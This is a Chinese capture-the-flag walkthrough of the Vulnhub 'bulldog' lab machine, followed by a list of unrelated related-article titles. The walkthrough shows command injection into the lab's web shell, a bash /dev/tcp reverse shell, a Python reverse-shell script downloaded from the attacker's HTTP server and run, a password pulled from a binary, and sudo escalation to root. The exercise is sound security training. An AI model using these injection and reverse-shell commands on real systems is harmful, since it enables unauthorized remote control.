配置:
VirtualBox运行靶机bulldog,网卡设置为Host-only;
VMware下运行kali作为攻击机,网卡设置为桥接模式Vritual box Host-only
Kali:192.168.56.102
bulldog:192.168.56.103
netdiscover -r 192.168.56.0/24
发现靶机IP:192.168.56.103
nmap -T4 -A -v -p- 192.168.56.103
开放了23、80、8080三个端口,发现ssh服务和web服务
dirsearch扫描下目录
访问/dev发现一个shell,但目前没登录还不能使用
查看/dev源代码发现
将Sarah的mad5值解码得到bulldoglover
访问/admin成功登录,提示没有权限
Linux提权
访问之前发现的/dev/shell
显示可以执行命令但只可以执行以上命令,尝试用&进行绕过
kali启动监听
nc -lvnp 4444
在/dev/shell输入
ls &&echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" | bash
拿到shell
cat /etc/passwd
cd /home/bulldogadmin
查看包括隐藏文件的全部文件
ls -la
查看.hiddenadmindirectory文件, 有note和customPermissionApp
note提示django用户有时有root权限
cat打开customPermissionApp文件都是乱码,用strings打开
strings customPermissionApp
发现密码:SUPERultimatePASSWORDyouCANTget
sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
用python调用本地的shell命令,利用python pty模块的shell来进行交互
python -c 'import pty;pty.spawn("/bin/sh")'
sudo su
输入密码拿到root权限
读取flag文件
另一种shell反弹方法:
在Kali上用python搭建一个简单HTTP服务器
python -m SimpleHTTPServer 80
shell脚本python-shell.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
把shell放到搭建的网站目录下
在192.168.56.103/dev/shell执行以下命令
pwd&wget http://192.168.56.102/python-shell.py
在kali监听
nc -lvnp 4444
/dev/shell下继续执行反弹脚本
pwd&python python-shell.py
kali得到shell

Vulnhub--bulldog相关推荐

  1. vulnhub bulldog

    配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置 ...

  2. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  3. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  4. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  5. 【Bulldog】靶场记录

    前言: 漏洞复现有点乏味并且时效性不强,所以我就开始下载vulnhub上的靶场进行练习,但是操作自己是了解的,就是想不到这种方法,还是靶场练习的太少了,所以本人要坚持练习靶场,然后把练习过程记录下来, ...

  6. vulnhub——Bulldog1

    攻击机:kali linux 目标靶机:Bulldog1(可在vulnhub中搜索下载) 目录 壹 信息收集 one 查看kali的IP地址 ​two 主机发现 three 端口扫描 贰 渗透测试 o ...

  7. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  8. bulldog靶机练习思路详解

    下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只 ...

  9. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  10. (Vulnhub练习)--Bulldog1渗透实战

    (Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...

最新文章

  1. Scala开发入门教程
  2. 乌当区利用大数据织密环境监测保护网
  3. tomcat 修改默认字符集
  4. 【Idea无法打开】Idea.bat可以正常打开,双击快捷方式无法打开解决办法
  5. python mysql数据库长连接_python 长连接 mysql数据库
  6. StringBoot设置了拦截器没有产生作用,页面没有拦截
  7. oracle常用操作指令
  8. 日常问题——解决mac下 ssh: connect to host localhost port 22: Connection refused
  9. Hive内部表与外部表区别详细介绍
  10. gdc服务器故障输入信号超出范围,H1Z1信号输入超出范围 | 手游网游页游攻略大全...
  11. html5新增表单控件和表单属性
  12. 图像处理二:仿射变换和透视变换
  13. 苹果Mac侧边栏笔记工具:​​​​​​​​SideNotes
  14. python求商和余数 考虑可能出现的异常情况_python面试题
  15. c语言 软件编程入门自学,软件编程入门自学
  16. 华硕装鸿蒙系统,智能家居 篇八:解决华硕路由器设置不当造成传感器延迟
  17. ubuntu 进不去界面解决方案
  18. 快手分身多开黑屏脚本
  19. 2345流氓软件让浏览器打开跳转到它的导航,并且自动下载安装2345浏览器
  20. wifi 的几种加密方式

热门文章

  1. jquery-9 京东和酒仙网左侧导航如何实现
  2. 糗百新鲜事——爬虫python
  3. nbu客户端卸载_卸载NETBACKUP FOR LINUX
  4. 破解网页文字无法复制的方法
  5. RV-LINK:GDB 使用 RV-LINK 仿真器调试 RISC-V 程序
  6. C# 数据操作系列 - 13 SugarSql初探
  7. 维生素C片剂市场现状及未来发展趋势
  8. 如何来隐藏自己本地的ip地址进行上网?
  9. 9款好看又实用的手机APP UI模板
  10. 路由跟踪命令 查看DNS IP Mac等